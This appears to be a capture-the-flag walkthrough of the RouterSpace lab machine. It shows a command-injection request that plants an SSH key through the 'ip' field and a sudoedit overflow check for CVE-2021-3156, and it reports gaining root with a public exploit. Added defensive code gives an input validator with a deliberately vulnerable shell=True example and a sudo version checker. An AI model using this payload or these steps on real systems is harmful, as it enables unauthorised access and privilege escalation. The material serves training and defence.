Enum

nmap

TCP

# Nmap 7.92 scan initiated Mon Apr  4 08:25:03 2022 as: nmap -sCV -oN nmap_tcp 10.129.227.47
Nmap scan report for 10.129.227.47
Host is up (0.031s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey: 
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_  256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open  http
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-31847
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 59
|     ETag: W/"3b-w4B/eVG5IpKygPyJlj8C71OlB2g"
|     Date: Mon, 04 Apr 2022 07:25:15 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: 0W3 8 }
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-91367
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Mon, 04 Apr 2022 07:25:15 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css">
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-16142
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Mon, 04 Apr 2022 07:25:15 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-title: RouterSpace
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=4/4%Time=624A9D5B%P=x86_64-pc-linux-gnu%r(NULL,
SF:29,"SSH-2\.0-RouterSpace\x20Packet\x20Filtering\x20V1\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.92%I=7%D=4/4%Time=624A9D5B%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,31BA,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX
SF:-Cdn:\x20RouterSpace-91367\r\nAccept-Ranges:\x20bytes\r\nCache-Control:
SF:\x20public,\x20max-age=0\r\nLast-Modified:\x20Mon,\x2022\x20Nov\x202021
SF:\x2011:33:57\x20GMT\r\nETag:\x20W/\"652c-17d476c9285\"\r\nContent-Type:
SF:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2025900\r\nDate:\x2
SF:0Mon,\x2004\x20Apr\x202022\x2007:25:15\x20GMT\r\nConnection:\x20close\r
SF:\n\r\n<!doctype\x20html>\n<html\x20class=\"no-js\"\x20lang=\"zxx\">\n<h
SF:ead>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x20\x
SF:20\x20<title>RouterSpace</title>\n\x20\x20\x20\x20<meta\x20name=\"descr
SF:iption\"\x20content=\"\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x
SF:20content=\"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\x
SF:20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstrap\.min\.css\">\n\x2
SF:0\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/owl\.carousel\.m
SF:in\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/m
SF:agnific-popup\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h
SF:ref=\"css/font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"sty
SF:lesheet\"\x20href=\"css/themify-icons\.css\">\n\x20")%r(HTTPOptions,108
SF:,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX-Cdn:\x20R
SF:outerSpace-16142\r\nAllow:\x20GET,HEAD,POST\r\nContent-Type:\x20text/ht
SF:ml;\x20charset=utf-8\r\nContent-Length:\x2013\r\nETag:\x20W/\"d-bMedpZY
SF:GrVt1nR4x\+qdNZ2GqyRo\"\r\nDate:\x20Mon,\x2004\x20Apr\x202022\x2007:25:
SF:15\x20GMT\r\nConnection:\x20close\r\n\r\nGET,HEAD,POST")%r(RTSPRequest,
SF:2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n"
SF:)%r(X11Probe,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20c
SF:lose\r\n\r\n")%r(FourOhFourRequest,121,"HTTP/1\.1\x20200\x20OK\r\nX-Pow
SF:ered-By:\x20RouterSpace\r\nX-Cdn:\x20RouterSpace-31847\r\nContent-Type:
SF:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2059\r\nETag:\x20W/
SF:\"3b-w4B/eVG5IpKygPyJlj8C71OlB2g\"\r\nDate:\x20Mon,\x2004\x20Apr\x20202
SF:2\x2007:25:15\x20GMT\r\nConnection:\x20close\r\n\r\nSuspicious\x20activ
SF:ity\x20detected\x20!!!\x20{RequestID:\x20\x20\x20\x200W3\x208\x20\x20}\
SF:n\n\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr  4 08:25:23 2022 -- 1 IP address (1 host up) scanned in 19.71 seconds

If we visit the web page, we can download RouterSpace.apk.

To run the APK on Linux we can use Anbox. There is a good blog post on how to install the tool and get it working.

After following those steps, we install RouterSpace.apk.

$ adb install RouterSpace.apk
Performing Streamed Install
Success

Once the command has completed, the app appears in Anbox.

If we start the app, we have the option to press “Check Status”.

If we do so, the app complains about not having internet connectivity.

To configure a proxy for Anbox we run

adb shell settings put global http_proxy 192.168.250.1:8080

Here 192.168.250.1 is the address of the Anbox interface. Next we configure Burp to listen on 192.168.250.1:8080.

Now we press “Check Status” again and we are able to capture the request.

We add routerspace.htb to /etc/hosts and send the request to Repeater.

Since the endpoint accepts an IP address as input, we can make an educated guess that the value is probably passed to ping or something similar.

By modifying the input parameter we can confirm our assumption.

Next we add our SSH key so that we can SSH into the box.

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 614
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate


{"ip":"; echo 'ssh-rsa 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 bob@kali' >  /home/paul/.ssh/authorized_keys"}
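The root cause above is a JSON field reaching a shell command unvalidated. The following is an added example, not code from the RouterSpace application or from this writeup, showing the defensive side: an allow-list validator for the "ip" field, the weak pattern beside a form that never involves a shell, and a small triage helper that a defender can run over captured request bodies for that endpoint. It assumes, as the text guesses, that the backend hands the field to ping; the function names, the ping flags and the sample bodies are constructed for illustration.

```python
from __future__ import annotations

import ipaddress
import json
import re
import subprocess

# Characters that have no business in an IP address but mean something to /bin/sh.
SHELL_META = re.compile(r"[;&|`$<>\n\r()]")


def is_valid_ip(value: str) -> bool:
    """Strict allow-list: accept only a literal IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def vulnerable_ping(ip: str) -> str:
    """Weak pattern (constructed, never call with untrusted input): the value is
    interpolated into a command string and parsed by a shell, so ';' or '|'
    in the field ends the ping command and starts another one."""
    result = subprocess.run(f"ping -c 1 {ip}", shell=True, capture_output=True, text=True)
    return result.stdout


def build_ping_argv(ip: str) -> list[str]:
    """Hardened form: validate first, then build an argument vector.  The list is
    passed to the kernel as argv, so no shell ever sees the value.  A validated
    address can never start with '-', so it cannot be mistaken for an option."""
    if not is_valid_ip(ip):
        raise ValueError("refusing non-IP target")
    return ["ping", "-c", "1", "-W", "2", ip]


def safe_ping(ip: str) -> bool:
    """Run the check without a shell; True when the host answered."""
    result = subprocess.run(build_ping_argv(ip), shell=False, capture_output=True, timeout=10)
    return result.returncode == 0


def triage_body(raw_body: str) -> dict:
    """Classify one captured request body for review of the deviceAccess endpoint:
    is the field a real address, and does it carry shell metacharacters?"""
    try:
        ip = json.loads(raw_body).get("ip", "")
    except (ValueError, AttributeError):
        return {"parse_error": True, "valid": False, "suspicious": True}
    if not isinstance(ip, str):
        ip = str(ip)
    return {
        "parse_error": False,
        "ip": ip,
        "valid": is_valid_ip(ip),
        "suspicious": bool(SHELL_META.search(ip)),
    }


# Constructed sample bodies: one benign, one in the shape of the injection above.
SAMPLE_BODIES = [
    '{"ip":"10.10.14.5"}',
    '{"ip":"10.10.14.5; id"}',
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(triage_body(body))
```

The validator is the important part: rejecting anything that is not a parseable address removes the whole class of payloads, and building argv instead of a command string means that even a validation mistake cannot turn into a second command.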

We run linpeas for further enumeration, which reports that the box is vulnerable to CVE-2021-.

After trying some PoCs for CVE-2021-3560 (pwnkit) without success, I google for sudo exploits, which leads me to CVE-2021-3156.

We perform the suggested vulnerability check by overflowing sudoedit.

paul@routerspace:/tmp$ sudoedit -s '\' `perl -e 'print "A" x 65536'`
malloc(): corrupted top size
Aborted (core dumped)

The crash suggests that this version is vulnerable.
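Crashing sudoedit is a quick test, but a non-destructive way for an administrator to find affected hosts is to compare the installed sudo version against the ranges named in the CVE-2021-3156 advisory (1.8.2 through 1.8.31p2, and 1.9.0 through 1.9.5p1). The following is an added example, not code from this writeup or from the sudo project: it parses the first line of `sudo --version` output and reports whether the upstream version falls inside those ranges. The sample output string and the function names are constructed; the only real interface used is the `sudo --version` command.

```python
import re
import subprocess

# Constructed sample of the first lines `sudo --version` prints on a legacy 1.8 build.
SAMPLE_VERSION_OUTPUT = "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n"

# Matches "Sudo version 1.9.5p2" and "Sudo version 1.8.31" (no patch level).
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# Upstream affected ranges from the CVE-2021-3156 advisory, as comparable tuples
# (major, minor, patch, plevel).  1.8.32 and 1.9.5p2 are the first fixed releases.
LEGACY_FIRST, LEGACY_LAST = (1, 8, 2, 0), (1, 8, 31, 2)
STABLE_FIRST, STABLE_LAST = (1, 9, 0, 0), (1, 9, 5, 1)


def parse_sudo_version(text: str):
    """Return (major, minor, patch, plevel) from version output, or None if absent."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_in_affected_range(version) -> bool:
    """Tuple comparison orders 1.8.31 < 1.8.31p2 < 1.8.32 exactly as sudo does."""
    return LEGACY_FIRST <= version <= LEGACY_LAST or STABLE_FIRST <= version <= STABLE_LAST


def assess(version_output: str) -> str:
    """Classify a host from its `sudo --version` text."""
    version = parse_sudo_version(version_output)
    if version is None:
        return "unknown-version"
    if version_in_affected_range(version):
        # Distributions backport the fix without changing the upstream string, so
        # a hit here is "check the package changelog", not a confirmed vulnerability.
        return "affected-by-upstream-version"
    return "not-in-affected-range"


def assess_local_host() -> str:
    """Run the check on the current machine (sudo --version needs no privileges)."""
    out = subprocess.run(["sudo", "--version"], capture_output=True, text=True, check=False).stdout
    return assess(out)


if __name__ == "__main__":
    print("sample:", assess(SAMPLE_VERSION_OUTPUT))
    print("this host:", assess_local_host())
```

The caveat in the code matters in practice: on the distributions that shipped 1.8.31, the security update kept that upstream number and only bumped the package revision, so the version string alone cannot clear a host, and only the package's changelog or the vendor advisory can.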

We use exploit_nss.py from this repo to achieve root.

paul@routerspace:/tmp$ python3 exploit.py 
# whoami
root
#